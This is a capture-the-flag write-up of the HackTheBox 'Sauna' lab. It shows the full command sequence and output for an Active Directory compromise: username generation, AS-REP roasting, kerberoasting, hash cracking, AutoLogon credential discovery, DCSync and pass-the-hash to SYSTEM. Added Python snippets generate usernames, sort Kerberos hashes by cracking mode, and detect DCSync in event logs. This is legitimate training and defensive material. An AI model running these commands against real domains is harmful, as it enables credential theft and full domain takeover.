
HTB — Sauna

AS-REP roasting of a username built from the staff names on the bank website. The svc_loanmgr account, found in Winlogon AutoLogon registry values, holds replication rights on the domain, so a DCSync dumps the Administrator hash for pass-the-hash.

January 20, 2025 · HackTheBox · Easy · Windows

#AD #ASREPRoasting #DCSync #Kerberos

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 18:33 EST
Stats: 0:02:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 18:36 (0:00:00 remaining)
Nmap scan report for 10.10.10.175
Host is up (0.022s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-21 06:34:48Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-21T06:35:45
|_  start_date: N/A
|_clock-skew: 7h00m02s
 
TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   18.55 ms 10.10.14.1
2   18.60 ms 10.10.10.175
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.02 seconds
 

80

sh
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE

buster

sh
feroxbuster -u http://10.10.10.175
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.175
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       29l       95w     1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      150c http://10.10.10.175/images => http://10.10.10.175/images/
301      GET        2l       10w      147c http://10.10.10.175/css => http://10.10.10.175/css/
200      GET     2337l     3940w    37414c http://10.10.10.175/css/font-awesome.css
200      GET      385l     1324w    14226c http://10.10.10.175/css/slider.css
200      GET      640l     1767w    30954c http://10.10.10.175/about.html
200      GET      683l     1813w    32797c http://10.10.10.175/index.html
200      GET      325l      770w    15634c http://10.10.10.175/contact.html
200      GET     2168l     4106w    37019c http://10.10.10.175/css/style.css
200      GET      111l      661w    50106c http://10.10.10.175/images/t1.jpg
200      GET      470l     1279w    24695c http://10.10.10.175/blog.html
200      GET      144l      850w    71769c http://10.10.10.175/images/t2.jpg
200      GET      684l     1814w    38059c http://10.10.10.175/single.html
200      GET      122l      750w    60163c http://10.10.10.175/images/t4.jpg
200      GET      138l      940w    76395c http://10.10.10.175/images/t3.jpg
200      GET      389l     1987w   159728c http://10.10.10.175/images/ab.jpg
301      GET        2l       10w      150c http://10.10.10.175/Images => http://10.10.10.175/Images/
200      GET      268l     2037w   191775c http://10.10.10.175/images/skill2.jpg
200      GET      657l     3746w   345763c http://10.10.10.175/images/skill1.jpg
200      GET     8975l    17530w   178152c http://10.10.10.175/css/bootstrap.css
200      GET      683l     1813w    32797c http://10.10.10.175/
301      GET        2l       10w      149c http://10.10.10.175/fonts => http://10.10.10.175/fonts/
301      GET        2l       10w      147c http://10.10.10.175/CSS => http://10.10.10.175/CSS/
301      GET        2l       10w      147c http://10.10.10.175/Css => http://10.10.10.175/Css/
301      GET        2l       10w      150c http://10.10.10.175/IMAGES => http://10.10.10.175/IMAGES/
301      GET        2l       10w      149c http://10.10.10.175/Fonts => http://10.10.10.175/Fonts/
400      GET        6l       26w      324c http://10.10.10.175/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/images/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/CSS/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/css/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/Images/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/fonts/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/Css/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/IMAGES/error%1F_log
400      GET        6l       26w      324c http://10.10.10.175/Fonts/error%1F_log
[####################] - 83s   270038/270038  0s      found:34      errors:2      
[####################] - 81s    30000/30000   372/s   http://10.10.10.175/ 
[####################] - 80s    30000/30000   373/s   http://10.10.10.175/images/ 
[####################] - 80s    30000/30000   373/s   http://10.10.10.175/css/ 
[####################] - 80s    30000/30000   374/s   http://10.10.10.175/Images/ 
[####################] - 81s    30000/30000   372/s   http://10.10.10.175/fonts/ 
[####################] - 79s    30000/30000   379/s   http://10.10.10.175/CSS/ 
[####################] - 79s    30000/30000   378/s   http://10.10.10.175/Css/ 
[####################] - 78s    30000/30000   385/s   http://10.10.10.175/IMAGES/ 
[####################] - 75s    30000/30000   399/s   http://10.10.10.175/Fonts/  

445

sh
445/tcp   open  microsoft-ds?
sh
smbclient -N -L \\\\10.10.10.175
Anonymous login successful
 
	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
sh
smbclient -N -L \\\\10.10.10.175 -U 'guest'
session setup failed: NT_STATUS_LOGON_FAILURE

rpcclient

sh
rpcclient -U "" 10.10.10.175
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
Staff names from the site's team page (about.html), saved to users.txt:

sh
cat users.txt
Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver
sh
/opt/username-anarchy/username-anarchy -i users.txt | tee potential_usernames.txt
fergus
fergussmith
fergus.smith
fergussm
fergsmit
ferguss
f.smith
fsmith
sfergus
s.fergus
smithf
smith
smith.f
smith.fergus
fs
hugo
hugobear
hugo.bear
hugob
h.bear
hbear
bhugo
b.hugo
bearh
bear
bear.h
bear.hugo
hb
steven
stevenkerb
steven.kerb
stevenke
stevkerb
stevenk
s.kerb
skerb
ksteven
k.steven
kerbs
kerb
kerb.s
kerb.steven
sk
shaun
shauncoins
shaun.coins
shauncoi
shaucoin
shaunc
s.coins
scoins
cshaun
c.shaun
coinss
coins
coins.s
coins.shaun
sc
bowie
bowietaylor
bowie.taylor
bowietay
bowitayl
bowiet
b.taylor
btaylor
tbowie
t.bowie
taylorb
taylor
taylor.b
taylor.bowie
bt
sophie
sophiedriver
sophie.driver
sophiedr
sophdriv
sophied
s.driver
sdriver
dsophie
d.sophie
drivers
driver
driver.s
driver.sophie
sd
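The formats above are easy to regenerate without the tool. The following is an added example written for this page (not username-anarchy's code or the writeup's) that rebuilds the same fifteen login formats from a "First Last" name, with the six names from the site as constructed input:

```python
# Added example (not code from the writeup or from username-anarchy): rebuild the
# login formats username-anarchy printed above from a list of "First Last" names.
# TEAM is constructed from the six staff names on the site's team page.

TEAM = [
    "Fergus Smith", "Hugo Bear", "Steven Kerb",
    "Shaun Coins", "Bowie Taylor", "Sophie Driver",
]


def username_formats(full_name):
    """Candidate logins for one 'First Last' name, in the order the tool prints them."""
    parts = full_name.lower().split()
    if not parts:
        return []
    if len(parts) == 1:
        return parts
    first, last = parts[0], parts[-1]
    fi, li = first[0], last[0]
    candidates = [
        first,                  # fergus
        first + last,           # fergussmith
        f"{first}.{last}",      # fergus.smith
        (first + last)[:8],     # fergussm  (8-char truncation)
        first[:4] + last[:4],   # fergsmit  (4+4 truncation)
        first + li,             # ferguss
        f"{fi}.{last}",         # f.smith
        fi + last,              # fsmith    <- the one that exists on Sauna
        li + first,             # sfergus
        f"{li}.{first}",        # s.fergus
        last + fi,              # smithf
        last,                   # smith
        f"{last}.{fi}",         # smith.f
        f"{last}.{first}",      # smith.fergus
        fi + li,                # fs
    ]
    # Short names collide (for "Hugo Bear" both truncations equal "hugobear"),
    # so dedupe while keeping the order.
    seen, out = set(), []
    for c in candidates:
        if c not in seen:
            seen.add(c)
            out.append(c)
    return out


def candidate_list(names):
    """Flat, order-preserving, deduplicated list for a whole staff page."""
    seen, out = set(), []
    for name in names:
        for c in username_formats(name):
            if c not in seen:
                seen.add(c)
                out.append(c)
    return out


if __name__ == "__main__":
    # Write the same file the kerbrute step below consumes.
    with open("potential_usernames.txt", "w") as fh:
        fh.write("\n".join(candidate_list(TEAM)) + "\n")
```

Six names give 88 candidates, the same count username-anarchy printed; kerbrute then tells you which of them the KDC knows.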
 

kerbrute

sh
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 potential_usernames.txt
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: dev (9cfb81e) - 01/20/25 - Ronnie Flathers @ropnop
 
2025/01/20 18:47:08 >  Using KDC(s):
2025/01/20 18:47:08 >  	10.10.10.175:88
 
2025/01/20 18:47:08 >  [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:7dd9ca66...
2025/01/20 18:47:08 >  [+] VALID USERNAME:	 fsmith@EGOTISTICAL-BANK.LOCAL

asrep

kerbrute's hash is etype 18 (AES256-CTS-HMAC-SHA1-96), which hashcat takes as mode 32100 and cracks much more slowly than RC4. GetNPUsers.py asks for the RC4 encryption type instead and returns an etype 23 hash for mode 18200:

sh
GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -no-pass -usersfile potential_usernames.txt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:60691c66...
sh
hashcat -m 18200 fsmith_asrep.txt /usr/share/wordlists/rockyou.txt                                         
 
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:60691c66...:Thestrokes23

creds

fsmith:Thestrokes23

sh
nxc smb 10.10.10.175 -u fsmith -p 'Thestrokes23'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 
sh
nxc winrm 10.10.10.175 -u fsmith -p 'Thestrokes23'
WINRM       10.10.10.175    5985   SAUNA            [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)

winrm

sh
evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith

user.txt

sh
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
f26ad217...

bloodhound

sh
sudo bloodhound-python -u 'fsmith' -p 'Thestrokes23' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c all
sh
zip -r EGOTISTICAL-BANK.LOCAL.zip *.json
sh
sudo neo4j console
sudo bloodhound

kerberoastable

BloodHound flags HSmith as kerberoastable (the account carries an SPN, shown below).

kerberoasting

nmap reported a 7h clock skew; the KDC rejects requests whose timestamp is more than 5 minutes off (KRB_AP_ERR_SKEW), so the clock is synced to the DC before requesting the TGS:

sh
sudo timedatectl set-ntp off                                                          
 
sudo ntpdate 10.10.10.175 & GetUserSPNs.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith -request-user hsmith 
[1] 1334773
2025-01-21 02:20:05.837534 (-0500) +25203.133355 +/- 0.010115 10.10.10.175 s1 no-leap
CLOCK: time stepped by 25203.133355
[1]  + done       sudo ntpdate 10.10.10.175
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 00:54:34.140321  <never>               
 
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$f2d351a2...
 
sh
hashcat -m 13100 hsmith.tgs /usr/share/wordlists/rockyou.txt


$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$f2d351a2...:Thestrokes23
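The AS-REP and TGS hashes on this page each needed a different hashcat mode, and kerbrute's etype 18 AS-REP needs a third. As an added example (not code from the writeup, hashcat or Impacket), this Python triage reads `$krb5asrep$` and `$krb5tgs$` lines, picks the mode from the family and etype, and maps hashcat's cracked output back to account and password. The sample hashes are constructed, shortened stand-ins for the ones above:

```python
import re

# Added example (not from the writeup, hashcat or Impacket): sort Kerberos hashes
# into the hashcat mode each needs and turn cracked lines back into credentials.
# SAMPLES are constructed with shortened hex; they are not the real values.

# (family, etype) -> hashcat mode
HASHCAT_MODES = {
    ("asrep", 23): 18200,  # RC4-HMAC, what GetNPUsers.py requests by default
    ("asrep", 17): 32100,  # AES128-CTS, hashcat >= 6.2.6
    ("asrep", 18): 32100,  # AES256-CTS, what kerbrute dumped above
    ("tgs", 23): 13100,
    ("tgs", 17): 19600,
    ("tgs", 18): 19700,
}

# $krb5asrep$23$user@REALM:checksum$edata (Impacket) / $krb5asrep$18$user@REALM:... (kerbrute)
ASREP_RE = re.compile(r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:$]+)[:$]")
# $krb5tgs$23$*user$REALM$spn*$...   or   $krb5tgs$18$user$REALM$*spn*$...
TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*?(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$\*?(?P<spn>[^*$]+)\*\$"
)
# hashcat outfile line: <hash>:<password>; every hash above ends in a hex blob, so the
# greedy match stops at the last "$<hex>:" (a password containing that pattern would confuse it)
CRACKED_RE = re.compile(r"^(?P<hash>\$krb5(?:asrep|tgs)\$\d+\$.*\$[0-9a-fA-F]+):(?P<password>.*)$")


def classify(line):
    """Return {'family','etype','user','realm','mode'} for a hash line, or None."""
    line = line.strip()
    m = ASREP_RE.match(line)
    family = "asrep"
    if m is None:
        m = TGS_RE.match(line)
        family = "tgs"
    if m is None:
        return None
    etype = int(m.group("etype"))
    return {
        "family": family,
        "etype": etype,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "mode": HASHCAT_MODES.get((family, etype)),  # None for an etype hashcat lacks
    }


def triage(lines):
    """Group hash lines by the hashcat mode they need; unrecognised lines land under None."""
    buckets = {}
    for line in lines:
        info = classify(line)
        mode = info["mode"] if info else None
        buckets.setdefault(mode, []).append(line.strip())
    return buckets


def parse_cracked(line):
    """Turn a hashcat '<hash>:<password>' line into (user, realm, password)."""
    m = CRACKED_RE.match(line.strip())
    if m is None:
        return None
    info = classify(m.group("hash"))
    if info is None:
        return None
    return info["user"], info["realm"], m.group("password")


# Constructed samples in the shapes seen above (hex parts shortened).
SAMPLES = [
    "$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:7dd9ca66$aabbccdd",
    "$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:60691c66$11223344",
    "$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$f2d351a2$55667788",
    "not a kerberos hash",
]

if __name__ == "__main__":
    for mode, hashes in triage(SAMPLES).items():
        print(mode, hashes)
```

Feeding a mixed file to one `hashcat -m` run silently skips the lines in the other format, which is the usual reason a "cracked" AS-REP never shows up; bucketing by mode first avoids that.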

creds

hsmith:Thestrokes23

sh
nxc smb 10.10.10.175 -u hsmith -p 'Thestrokes23'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\hsmith:Thestrokes23 

hsmith share

sh
nxc smb 10.10.10.175 -u hsmith -p 'Thestrokes23' --shares
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\hsmith:Thestrokes23 
SMB         10.10.10.175    445    SAUNA            [*] Enumerated shares
SMB         10.10.10.175    445    SAUNA            Share           Permissions     Remark
SMB         10.10.10.175    445    SAUNA            -----           -----------     ------
SMB         10.10.10.175    445    SAUNA            ADMIN$                          Remote Admin
SMB         10.10.10.175    445    SAUNA            C$                              Default share
SMB         10.10.10.175    445    SAUNA            IPC$            READ            Remote IPC
SMB         10.10.10.175    445    SAUNA            NETLOGON        READ            Logon server share 
SMB         10.10.10.175    445    SAUNA            print$          READ            Printer Drivers
SMB         10.10.10.175    445    SAUNA            RICOH Aficio SP 8300DN PCL 6 WRITE           We cant print money
SMB         10.10.10.175    445    SAUNA            SYSVOL          READ            Logon server share

winpeas

Autologon credentials

sh
╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
 
The registry value names svc_loanmanager, but the domain user list has no such account, only svc_loanmgr, and the AutoLogon password is valid for it:

sh
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user /domain
 
User accounts for \\
 
-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.
 
sh
nxc smb 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
SMB         10.10.10.175    445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.175    445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!

creds

svc_loanmgr:Moneymakestheworldgoround!

winrm

sh
nxc winrm 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
WINRM       10.10.10.175    5985   SAUNA            [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA            [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)
sh
evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'

DCSync

svc_loanmgr holds replication rights on the domain object (the DCSync edge in BloodHound), so secretsdump.py can pull every account's secrets over DRSUAPI. The rpc_s_access_denied line is the remote-registry SAM/LSA path, which needs local admin on the DC; -just-dc skips it.

sh
impacket-secretsdump 'EGOTISTICAL-BANK.LOCAL'/'svc_loanmgr':'Moneymakestheworldgoround!'@'10.10.10.175'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435...:82345207...:::
Guest:501:aad3b435...:31d6cfe0...:::
krbtgt:502:aad3b435...:4a889942...:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435...:58a52d36...:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435...:58a52d36...:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435...:9cb31797...:::
SAUNA$:1000:aad3b435...:f96e2380...:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c...
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894d...
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b0...
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b0744...
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31...
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:de6dc38f62b196b8c5fe9a98e6a883e17558431c71e41e3a1a103a8b8ac5d7ed
SAUNA$:aes128-cts-hmac-sha1-96:3fda1ccf...
SAUNA$:des-cbc-md5:104c515b86739e08
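What secretsdump needed here was not Domain Admins membership but the replication extended rights on the domain object, and the same three GUIDs are what a defender looks for in Event ID 4662. The following is an added example (not code from the writeup, Impacket or BloodHound) that applies them both ways, with constructed ACEs and log records:

```python
# Added example (not from the writeup, Impacket or BloodHound): the three extended
# rights behind DCSync, used (1) to decide from a domain object's ACEs whether a
# principal can replicate secrets and (2) to flag Event ID 4662 records in which a
# non-DC identity exercised them. DOMAIN_ACES and EVENTS are constructed.

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL, DS_REPL_GET_CHANGES_FILTERED}

# Simplified ACE: (trustee, right). 'right' is an extended-right GUID or one of the
# generic rights whose holder can grant itself the replication rights.
CONTROL_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner"}


def can_dcsync(trustee, aces, groups=()):
    """True if trustee (directly or via groups) can run DCSync against the domain.

    Full secret replication needs Get-Changes AND Get-Changes-All; the Filtered-Set
    right alone does not expose password hashes.
    """
    principals = {trustee, *groups}
    held = {right for who, right in aces if who in principals}
    if held & CONTROL_RIGHTS:
        return True
    return DS_REPL_GET_CHANGES in held and DS_REPL_GET_CHANGES_ALL in held


def detect_dcsync(events, dc_accounts):
    """Return (who, object, rights) for 4662 events where a non-DC used a replication right."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        # 4662 'Properties' is whitespace-separated text containing {GUID}s; normalise to a set.
        props = {p.strip("{} ").lower() for p in ev.get("Properties", "").split()}
        used = props & REPLICATION_RIGHTS
        if not used:
            continue
        who = ev.get("SubjectUserName", "")
        if who in dc_accounts:
            continue  # DCs replicate with each other constantly; that is the baseline
        hits.append((who, ev.get("ObjectName"), sorted(used)))
    return hits


# Constructed ACEs on the domain object in the shape of what BloodHound shows for Sauna.
DOMAIN_ACES = [
    ("Domain Controllers", DS_REPL_GET_CHANGES),
    ("Domain Controllers", DS_REPL_GET_CHANGES_ALL),
    ("svc_loanmgr", DS_REPL_GET_CHANGES),
    ("svc_loanmgr", DS_REPL_GET_CHANGES_ALL),
    ("FSmith", DS_REPL_GET_CHANGES_FILTERED),  # hypothetical: Filtered-Set alone is not enough
]

# Constructed 4662 records (Security log, "Directory Service Access" auditing enabled).
EVENTS = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "ObjectName": "DC=EGOTISTICAL-BANK,DC=LOCAL",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "ObjectName": "DC=EGOTISTICAL-BANK,DC=LOCAL",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "FSmith", "ObjectName": "CN=HSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL",
     "Properties": "{11111111-2222-3333-4444-555555555555}"},  # placeholder GUID, not a replication right
    {"EventID": 4624, "SubjectUserName": "svc_loanmgr"},
]

if __name__ == "__main__":
    print(can_dcsync("svc_loanmgr", DOMAIN_ACES))
    print(detect_dcsync(EVENTS, {"SAUNA$"}))
```

On a real domain the allow-list is every DC computer account plus any legitimate replicator such as an Azure AD Connect MSOL_ account; anything else exercising Get-Changes-All against the domain naming context is a DCSync.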

Pass-the-hash with the Administrator NT hash from the dump (LM half left empty):

sh
impacket-psexec administrator@10.10.10.175 -hashes :82345207...
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file JnTHYKTA.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service DjUm on 10.10.10.175.....
[*] Starting service DjUm.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system

